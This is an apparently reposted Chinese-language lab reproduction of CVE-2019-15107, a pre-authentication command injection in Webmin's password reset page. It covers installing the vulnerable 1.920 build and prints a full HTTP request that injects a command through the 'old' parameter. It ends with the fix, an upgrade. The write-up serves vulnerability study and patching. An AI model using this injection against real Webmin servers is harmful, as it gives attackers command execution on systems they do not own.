CVE-2019-15107 Webmin远程命令执行漏洞复现
0X1 漏洞概述
Webmin的是一個用于管理類Unix的系統的管理配置工具,具有網絡頁面。在其找回密碼頁面中,存在一處無需權限的命令注入漏洞,通過這個漏洞攻擊者即可以執行任意系統命令。它已知在端口10000上運行。在重置密碼功能中發現了一個錯誤,該錯誤允許惡意第三方由于缺少輸入驗證而執行惡意代碼。
影響版本
Webmin <= 1.9200X2 環境搭建
根據最新消息,該應用在官方提供的sourceforge下載的源碼才包含這個漏洞,而官方Github上的代碼是安全的。這也證明這個RCE漏洞很有可能是一次供應鏈攻擊,黑客控制了官方sourceforge賬戶并植入了后門。在sourceforge上下載,鏈接如下
https://sourceforge.net/projects/webadmin/files/webmin/1.920/在這里,我們下載deb安裝包,在ubuntu16.04中安裝,如下:
如果報錯,按照提示更新系統就可以了。安裝成功之后,以root賬戶身份登錄即可。
https://192.167.0.217:10000/sysinfo.cgi?xnavigation=1登錄之后點擊authentication修改密碼重置配置
查看配置文件
cat /etc/webmin/miniserv.conf0X3 漏洞利用
訪問/password_change.cgi鏈接,抓包注入命令
POST /password_change.cgi HTTP/1.1 Host: 192.167.0.217:10000 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: redirect=1; testing=1; sid=2c97114272115f9e3e52307ff418b31d; sessiontest=1 DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Content-Length: 60user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2這里的user值要是用的是一個假的用戶,使用真實的root測試不成功,只有在發送的用戶參數的值不是已知的Linux用戶的情況下(而參考鏈接中是user=root123),展示進入才會到修改/etc/shadow的地方,觸發命令注入漏洞
查看response
可以看到命令執行成功!
0X3 漏洞修復
升級到最新的1.9.30版本即可
參考鏈接
http://www.webmin.com/index.html
https://www.exploit-db.com/exploits/47230
https://blog.firosolutions.com/exploits/webmin/
https://github.com/vulhub/vulhub/blob/master/webmin/CVE-2019-15107/README.zh-cn.md
總結
以上是生活随笔為你收集整理的CVE-2019-15107 Webmin远程命令执行漏洞复现的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Ensemble learning(集成
- 下一篇: 剑指offer-99.调整数组顺序使奇数